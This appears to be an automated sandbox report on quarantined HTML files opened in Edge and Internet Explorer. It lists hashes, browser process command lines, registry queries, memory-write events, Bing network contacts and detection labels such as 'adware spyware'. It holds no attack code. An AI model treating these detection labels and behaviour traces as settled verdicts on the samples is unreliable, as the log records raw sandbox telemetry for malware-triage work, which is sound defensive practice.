SHA512 3d902b9e64c1772abb5358e77f74aa75296bb261856fd41a7c5906b7b57db745d0e0fda9495026fd2c526ebed9ee539958c501eeea4af927c601d39e5aea824b

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 3745a8360a6cc468493cdbef079f793b
SHA1 90453fe2e1e20bb71a92d52e081566ba7fb13219
SHA256 7359d4d5b0abf3a34095c8166a9285d499e391db50655f60062fbd1de5c19214
SHA512 f745eb011e9679c8ec75c661d75267155ae978d30d1c5d71e3b68a899aead60f0560116d756b1b83949834c1b8cb9ec81da084d95b95b28983555b35271fad68

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 3b970f1927d06ff0ae73933a6b7d0118
SHA1 9ee4434c434cfc3bc268c4da6cf9edcec2aaad88
SHA256 607315331e28b215cf7580f849711f1546d26e3b4e6b1492a28e73951b11cf1f
SHA512 87e7a142a4f83b6878ed151e2312cc8597fcfa450b67f5b9d8d5b5fcea2566a674ae469da7b191ecd1bcd77c105dce76921f20512e7d493dea51fa2d5fb627c2

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 9c9d15c508aab12aa7a30c371f7e01a7
SHA1 fca566017114aa908c30046e647863fbe9ba3657
SHA256 4beebbf2b985abcae03de1ca96db267d7ba8f090a6663b9c03f3ea0089807239
SHA512 5e156aeb0842cbf15edfdfbf92f9b60abb5e9e9d17e24bba6c685b7c50afbfdc94a9cd667c314adf3c01dc26c57e2852f25cc036bd53aff61223f9024351c835

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 598e9cd8eae748fe31db065b327dd0a1
SHA1 d7fa8946624f61849e52631be2482d16f212fc59
SHA256 beb41616d30157cc5c7a6dfa3ad1d6b656c6743f375a193ded872645da883e0f
SHA512 7a9accaceb3583b0a61d4dd893c691c954ac0a13cd0b62a95a9c7e0876c5e1e1e43a50f45e31bd060ed00953e046e353077679e62cf9ae75609f95e2e32d0778

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 f3250cd8787c1b257fdd70c9fbf90858
SHA1 251b858536e4863a8abce3e06cdcafa8d5617a88
SHA256 47aa3995893dc6d3c21552fb0cb99eecc40daf05628490c9e39e77ef36fb46da
SHA512 868185611ab7fc10c73a52ce4ebc30ef2b1905b9def5973902ae9cf6cce06bb83f183ec5727ca467a7f627b7948c3366b0b9d5cdd6c6ff46b06ec767e9a30045

Analysis: behavioral8

Detonation Overview

Submitted

2025-02-26 23:45

Reported

2025-02-26 23:48

Platform

win10v2004-20250217-en

Max time kernel

146s

Max time network

141s

Command Line

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument C:\Users\Admin\AppData\Local\Temp\quarantine\GEFwbK0.html

Signatures

Browser Information Discovery

discovery

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4272 wrote to memory of 768 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4272 wrote to memory of 768 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4272 wrote to memory of 4488 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4272 wrote to memory of 4488 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4272 wrote to memory of 4488 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4272 wrote to memory of 4488 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4272 wrote to memory of 4488 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4272 wrote to memory of 4488 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4272 wrote to memory of 4488 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4272 wrote to memory of 4488 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4272 wrote to memory of 4488 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4272 wrote to memory of 4488 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4272 wrote to memory of 4488 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4272 wrote to memory of 4488 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4272 wrote to memory of 4488 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4272 wrote to memory of 4488 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4272 wrote to memory of 4488 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4272 wrote to memory of 4488 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4272 wrote to memory of 4488 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4272 wrote to memory of 4488 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4272 wrote to memory of 4488 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4272 wrote to memory of 4488 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4272 wrote to memory of 4488 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4272 wrote to memory of 4488 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4272 wrote to memory of 4488 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4272 wrote to memory of 4488 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4272 wrote to memory of 4488 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4272 wrote to memory of 4488 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4272 wrote to memory of 4488 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4272 wrote to memory of 4488 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4272 wrote to memory of 4488 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4272 wrote to memory of 4488 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4272 wrote to memory of 4488 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4272 wrote to memory of 4488 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4272 wrote to memory of 4488 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4272 wrote to memory of 4488 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4272 wrote to memory of 4488 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4272 wrote to memory of 4488 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4272 wrote to memory of 4488 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4272 wrote to memory of 4488 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4272 wrote to memory of 4488 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4272 wrote to memory of 4488 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4272 wrote to memory of 1772 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4272 wrote to memory of 1772 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4272 wrote to memory of 4652 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4272 wrote to memory of 4652 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4272 wrote to memory of 4652 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4272 wrote to memory of 4652 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4272 wrote to memory of 4652 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4272 wrote to memory of 4652 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4272 wrote to memory of 4652 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4272 wrote to memory of 4652 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4272 wrote to memory of 4652 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4272 wrote to memory of 4652 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4272 wrote to memory of 4652 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4272 wrote to memory of 4652 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4272 wrote to memory of 4652 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4272 wrote to memory of 4652 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4272 wrote to memory of 4652 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4272 wrote to memory of 4652 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4272 wrote to memory of 4652 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4272 wrote to memory of 4652 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4272 wrote to memory of 4652 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4272 wrote to memory of 4652 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Processes

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument C:\Users\Admin\AppData\Local\Temp\quarantine\GEFwbK0.html

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff8297446f8,0x7ff829744708,0x7ff829744718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2096,9470080567967369979,2915843246628451140,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2108 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2096,9470080567967369979,2915843246628451140,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2432 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2096,9470080567967369979,2915843246628451140,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2840 /prefetch:8

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,9470080567967369979,2915843246628451140,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3256 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,9470080567967369979,2915843246628451140,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3272 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2096,9470080567967369979,2915843246628451140,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5052 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2096,9470080567967369979,2915843246628451140,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5052 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,9470080567967369979,2915843246628451140,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5056 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,9470080567967369979,2915843246628451140,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5140 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,9470080567967369979,2915843246628451140,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5640 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,9470080567967369979,2915843246628451140,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5656 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2096,9470080567967369979,2915843246628451140,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3488 /prefetch:2

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 150.171.28.10:443 g.bing.com tcp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp

Files

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 39e376ee2f541e6b1ed0bca701e8fb59
SHA1 bfe3cc2eed8721339d433533aef6e18e0a13a9a3
SHA256 80eda1e4d8c05e257ff17ef734d606e67d8ab70b3e351430b2b231631eed5e04
SHA512 a3f082c32857db0e3dec24394a259fff85e21b6a7b057ef55933504c23ec38cbb3237eb519d38385fc53cbc584c52aaf66291f44231245d9afee509a108a3350

\??\pipe\LOCAL\crashpad_4272_WTMVUIIIXJRTXJUS

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 39c51e5592e99966d676c729e840107b
SHA1 e2dd9be0ffe54508a904d314b3cf0782a9a508b7
SHA256 29f29a3495976b65de3df2d537628d260bc005da5956b262ff35e9f61d3d9ed3
SHA512 b20532d0131b12603410c3cb425cb5df0ddc740f34e688455eff757802ffc854be771b30c3ff196e56b396c6fe53928a1577c8330b00f3f7b849fcf625e51bf4

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 9bcb2d514ba3efd957eb05ae23870238
SHA1 35f1fd68170fa393150e3c99996bd54895562ab3
SHA256 39c2195f90d0f08e559b5b82d5969955242f7311c57227d6efde15c901daa886
SHA512 2345172ea06f1dfe56807e13b42b433efe336b4c64464bae22de9a14ef01881df5d109f8d82c6198749b6709461b6873fb3eb600b52823ae9bbda6fef379157c

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 6752a1d65b201c13b62ea44016eb221f
SHA1 58ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA256 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA512 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 10b1e09e2534dbb9d75fb76e9afa714f
SHA1 fd2d3d4b175852c4b097e4132796d78a614c4d83
SHA256 d649ef377e3944ab56ac2b881604588039978a98b0c45bf0dfd2e9de6418b490
SHA512 d688650f1344117e6255c7762ee6973f1182906ec77e8b285e65d1788bc8f41982dfe520159d0ca98f67f3ede13e52b8d4bcb61e770ec891f2120adec2601782

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 23128425cee77e8d2c44a586910cce0a
SHA1 06620501a1bbf08b0de2d4d5ecf9f9f1d6bc17fe
SHA256 cb649a8b1628238750eaed44fb960fde738053fffaa1fa7a5b43a51a439a0b36
SHA512 a05e40196d2b5f253e888c758eb04c54ea86bfea75b5f06037c9382f3ae8c48f01d158592b3f83a0f122bcdbded19f7eb8c6cc2e4c4054c411d31d5d62843380

Analysis: behavioral27

Detonation Overview

Submitted

2025-02-26 23:45

Reported

2025-02-26 23:48

Platform

win7-20241010-en

Max time kernel

69s

Max time network

136s

Command Line

"C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\AppData\Local\Temp\quarantine\ssystemfiktums.html

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser C:\Program Files\Internet Explorer\iexplore.exe N/A
